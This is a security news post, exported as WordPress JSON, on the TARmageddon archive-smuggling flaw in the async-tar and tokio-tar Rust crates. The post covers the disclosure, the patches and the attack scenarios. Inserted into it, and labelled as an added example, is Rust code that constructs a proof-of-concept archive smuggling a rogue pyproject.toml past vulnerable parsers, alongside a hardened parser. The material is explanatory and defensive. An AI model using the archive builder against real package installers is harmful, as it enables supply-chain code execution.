{"id":7888,"date":"2025-10-23T10:03:33","date_gmt":"2025-10-23T10:03:33","guid":{"rendered":"https:\/\/serisec.com\/index.php\/2025\/10\/23\/tarmageddon-vulnerability-in-rust-library-let-attackers-replace-config-files-and-execute-remote-codes\/"},"modified":"2025-10-23T10:03:33","modified_gmt":"2025-10-23T10:03:33","slug":"tarmageddon-vulnerability-in-rust-library-let-attackers-replace-config-files-and-execute-remote-codes","status":"publish","type":"post","link":"https:\/\/serisec.com\/index.php\/2025\/10\/23\/tarmageddon-vulnerability-in-rust-library-let-attackers-replace-config-files-and-execute-remote-codes\/","title":{"rendered":"TARmageddon Vulnerability In Rust Library Let Attackers Replace Config Files And Execute Remote Codes"},"content":{"rendered":"<div>\n<p>A severe vulnerability has been disclosed in the async-tar Rust library and its popular forks, including the widely used tokio-tar. Dubbed TARmageddon and tracked as CVE-2025-62518, the bug carries a CVSS score of 8.1, classifying it as high severity.<\/p>\n<p>It allows attackers to manipulate TAR archive parsing, potentially overwriting critical files such as configuration files and triggering remote code execution (RCE) on affected systems.<\/p>\n<p>According to Edera, the flaw stems from a boundary-parsing error that mishandles nested TAR files, specifically when a PAX extended header and the ustar header that follows it disagree about an entry\u2019s size.<\/p>\n<p>In vulnerable versions, the parser takes the entry size from the ustar header, which the attacker sets to zero, and ignores the correct size recorded in the PAX header. It therefore skips none of the entry\u2019s data and instead reads that data, an attacker-supplied inner TAR, as the next headers of the outer archive. <\/p>\n<p>This desynchronization lets hidden entries from inner archives \u201csmuggle\u201d into the outer extraction, overwriting files in the target directory. 
<\/p>\n<p>Major projects such as Astral\u2019s uv Python package manager, the testcontainers test framework, and wasmCloud are affected, and the vulnerability\u2019s reach extends across millions of downloads because of tokio-tar\u2019s ubiquity in the <a href=\"https:\/\/cybersecuritynews.com\/tag\/rust-vulnerability\/\" target=\"_blank\" rel=\"noreferrer noopener\">Rust ecosystem<\/a>.<\/p>\n<h2 class=\"wp-block-heading\" id=\"h-navigating-the-maze-of-abandoned-forks\"><strong>Navigating The Maze Of Abandoned Forks<\/strong><\/h2>\n<p>Disclosing and patching TARmageddon proved unusually complex because tokio-tar, the most downloaded fork with over 5 million crates.io pulls, appears abandoned, with no active maintainers, no SECURITY.md file, and scant contact info.<\/p>\n<p>Edera coordinated a decentralized effort across the fork lineage: from the root async-tar to tokio-tar, then to their own krata-tokio-tar (now archived) and Astral\u2019s actively maintained astral-tokio-tar.<\/p>\n<p>Researchers developed patches for the active forks, shared them under a 60-day embargo starting August 21, 2025, and reached out to downstream projects such as binstalk and opa-wasm. <\/p>\n<p>While Astral swiftly integrated the fix into uv and their fork, responses from others were mixed; some planned to drop the dependency, while uncontacted users remain exposed. <\/p>\n<p>The original tokio-tar and async-tar remain unpatched, so their users must migrate manually. Edera <a href=\"https:\/\/edera.dev\/stories\/tarmageddon\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">urges<\/a> immediate upgrades to patched versions or removal of the dependency, with astral-tokio-tar as the recommended alternative.<\/p>\n<p>The patch gives the PAX header priority when determining entry sizes, validates that the PAX and ustar headers agree, and adds boundary safeguards so the parser cannot be desynchronized from the real entry layout. 
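<\/p>\n<p>The parsing flaw and the patch behaviour described above, as an added example that is not code from the page or from the async-tar, tokio-tar or astral-tokio-tar projects: a minimal ustar\/PAX walker in Rust built two ways, one taking every entry size from the ustar header and one giving a preceding PAX size record priority, rejecting a non-zero ustar size that disagrees with it, and refusing data that runs past the archive boundary (the boundary check is kept in both variants so neither panics on malformed input). It constructs an outer archive whose inner.tar entry carries a PAX size record but a ustar size of 0, with a complete inner archive, containing its own pyproject.toml, as that entry\u2019s data. The archive contents, all helper names and the exact consistency rule are assumptions of this example, not the patched libraries\u2019 code.<\/p>

```rust
// Added example, not code from the page or from async-tar/tokio-tar: a minimal ustar/PAX walker
// built two ways. Archive contents, helper names and the consistency policy are assumptions.
const BLOCK: usize = 512;
pub struct Entry { pub name: String, pub data: Vec<u8> }

/// One ustar header; `size_field` is written verbatim so a caller can make it lie.
fn header(name: &str, size_field: u64, typeflag: u8) -> [u8; BLOCK] {
    let mut h = [0u8; BLOCK];
    let size = format!("{:011o}\0", size_field);
    let fields: [(usize, &[u8]); 8] = [
        (0, name.as_bytes()), (100, b"0000644\0"), (108, b"0000000\0"), (116, b"0000000\0"),
        (124, size.as_bytes()), (136, b"00000000000\0"), (148, b"        "), (257, b"ustar\0"),
    ];
    for (at, bytes) in fields { h[at..at + bytes.len()].copy_from_slice(bytes); }
    h[156] = typeflag;
    h[263..265].copy_from_slice(b"00");
    let sum: u32 = h.iter().map(|&b| u32::from(b)).sum(); // checksum field counted as spaces
    h[148..156].copy_from_slice(format!("{:06o}\0 ", sum).as_bytes());
    h
}

/// Header block followed by its data, zero-padded to a 512-byte boundary.
fn block(h: [u8; BLOCK], data: &[u8]) -> Vec<u8> {
    let mut v = [&h[..], data].concat();
    v.resize(BLOCK + (data.len() + BLOCK - 1) / BLOCK * BLOCK, 0);
    v
}

fn file(name: &str, data: &[u8]) -> Vec<u8> { block(header(name, data.len() as u64, b'0'), data) }

/// PAX extended header ('x') with one "<len> key=value\n" record; <len> counts its own digits.
fn pax_entry(key: &str, value: &str) -> Vec<u8> {
    let body = format!("{key}={value}\n");
    let mut total = body.len() + 2;
    while total.to_string().len() + 1 + body.len() > total { total += 1; }
    block(header("PaxHeader/inner.tar", total as u64, b'x'), format!("{total} {body}").as_bytes())
}

/// Entries followed by the two zero blocks that terminate an archive.
fn archive(parts: &[Vec<u8>]) -> Vec<u8> { [parts.concat(), vec![0; 2 * BLOCK]].concat() }

/// Outer archive whose "inner.tar" entry is declared 0 bytes by ustar but its true size by PAX;
/// the entry's data is a complete inner archive carrying its own pyproject.toml.
pub fn tarmageddon_archive() -> Vec<u8> {
    let inner = archive(&[file("pyproject.toml", b"[build-system]\nbuild-backend = \"rogue_backend\"\n")]);
    archive(&[
        file("pyproject.toml", b"[build-system]\nbuild-backend = \"setuptools.build_meta\"\n"),
        pax_entry("size", &inner.len().to_string()), // PAX tells the truth...
        block(header("inner.tar", 0, b'0'), &inner),  // ...ustar says nothing follows
    ])
}

/// The "size" record from a PAX data block.
fn pax_size(data: &[u8]) -> Option<u64> {
    let mut rest = std::str::from_utf8(data).ok()?;
    while let Some((len, tail)) = rest.split_once(' ') {
        let body_len = len.parse::<usize>().ok()?.checked_sub(len.len() + 1)?;
        let body = tail.get(..body_len)?;
        if let Some(("size", v)) = body.trim_end_matches('\n').split_once('=') { return v.parse().ok(); }
        rest = &tail[body_len..];
    }
    None
}

/// pax_priority=false: the vulnerable walker trusts only the ustar size, so after the "0-byte" inner.tar
/// it lands on the inner archive's first header. pax_priority=true: PAX wins; a disagreeing non-zero ustar size is an error.
fn walk(tar: &[u8], pax_priority: bool) -> Result<Vec<Entry>, String> {
    let (mut entries, mut pending_pax, mut off) = (Vec::new(), None::<u64>, 0usize);
    while off + BLOCK <= tar.len() {
        let h = &tar[off..off + BLOCK];
        if h.iter().all(|&b| b == 0) { break; } // end-of-archive marker
        let name = String::from_utf8_lossy(&h[..h[..100].iter().position(|&b| b == 0).unwrap_or(100)]).into_owned();
        let size_text = std::str::from_utf8(&h[124..136]).unwrap_or("").trim_end_matches(&['\0', ' '][..]);
        let ustar_size = u64::from_str_radix(size_text, 8).map_err(|_| format!("{name}: unparsable size field"))?;
        let typeflag = h[156];
        off += BLOCK;
        let mut size = ustar_size;
        if pax_priority && typeflag != b'x' {
            if let Some(p) = pending_pax.take() {
                if ustar_size != 0 && ustar_size != p { return Err(format!("{name}: ustar size {ustar_size} disagrees with PAX size {p}")); }
                size = p;
            }
        }
        let end = off.checked_add(size as usize).filter(|&e| e <= tar.len()).ok_or_else(|| format!("{name}: data runs past the archive end"))?; // bounds check, both variants
        let data = &tar[off..end];
        if typeflag == b'x' { pending_pax = pax_size(data); } else { entries.push(Entry { name, data: data.to_vec() }); }
        off = (end + BLOCK - 1) / BLOCK * BLOCK;
    }
    Ok(entries)
}

pub fn list_vulnerable(tar: &[u8]) -> Result<Vec<Entry>, String> { walk(tar, false) }
pub fn list_hardened(tar: &[u8]) -> Result<Vec<Entry>, String> { walk(tar, true) }

/// Paths a sequential extraction would write twice: a cheap runtime sign of smuggled entries.
pub fn overwritten_paths(entries: &[Entry]) -> Vec<String> {
    let mut seen = std::collections::HashSet::new();
    entries.iter().filter(|e| !seen.insert(e.name.as_str())).map(|e| e.name.clone()).collect()
}
```

<p>With the ustar-only walker the listing of the constructed archive is pyproject.toml, inner.tar (0 bytes), pyproject.toml again, so a sequential extraction writes the rogue build backend over the benign file; the PAX-priority walker lists pyproject.toml and a 2048-byte inner.tar and stops at the outer archive\u2019s terminator, and it returns an error for an entry whose non-zero ustar size contradicts its PAX record or whose declared data would run past the end of the archive. <code>overwritten_paths<\/code> is the sort of cheap runtime check that flags the smuggled entry where the library itself cannot be replaced yet.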
<\/p>\n<p>For those unable to switch quickly, workarounds include switching to the synchronous tar crate, or adding runtime checks such as validating the extracted file list against a manifest and extracting into a sandbox.<\/p>\n<p>Attackers could exploit TARmageddon in several ways. In one scenario, a malicious <a href=\"https:\/\/cybersecuritynews.com\/tag\/pypi-packages\/\" target=\"_blank\" rel=\"noreferrer noopener\">PyPI package<\/a> ships an outer TAR whose pyproject.toml is benign, but a nested inner TAR smuggled in as an entry overwrites it with one that names a rogue build backend, so code executes during installation on developer or CI machines.<\/p>\n<p>Container frameworks such as testcontainers risk poisoned test environments if they extract tainted image layers, introducing backdoors. Security scanners might approve a \u201cclean\u201d outer archive, only for extraction to pull in unscanned malware, bypassing software bill-of-materials checks.<\/p>\n<p>This incident underscores the limits of Rust\u2019s safety guarantees: the language rules out memory-safety bugs, but logic flaws like this one persist, especially in unmaintained code. <\/p>\n<p>The 60-day timeline from private disclosure to maintainers on August 21 to coordinated public release on October 21 highlights the inefficiencies of fork-heavy ecosystems. <\/p>\n<p>Edera notes that its own products were unaffected thanks to defense in depth, but the episode calls for better maintenance signals and proactive forking in open source. 
<\/p>\n<p>The post <a href=\"https:\/\/cybersecuritynews.com\/tarmageddon-vulnerability\/\">TARmageddon Vulnerability In Rust Library Let Attackers Replace Config Files And Execute Remote Codes<\/a> appeared first on <a href=\"https:\/\/cybersecuritynews.com\/\">Cyber Security News<\/a>.<\/p>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>TARmageddon Vulnerability In Rust Library Let Attackers Replace Config Files And Execute Remote Codes A severe vulnerability in the async-tar Rust library and its popular forks, including the widely used tokio-tar. Dubbed TARmageddon and tracked as CVE-2025-62518, the bug carries a CVSS score of 8.1, classifying it as high severity. 
It allows attackers to manipulate [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[129,63,131,648],"tags":[130],"class_list":["post-7888","post","type-post","status-publish","format-standard","hentry","category-cyber-security","category-cyber-security-news","category-vulnerability","category-vulnerability-news","tag-cyber-security-news"],"_links":{"self":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/7888"}],"collection":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/comments?post=7888"}],"version-history":[{"count":0,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/7888\/revisions"}],"wp:attachment":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/media?parent=7888"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/categories?post=7888"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/tags?post=7888"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}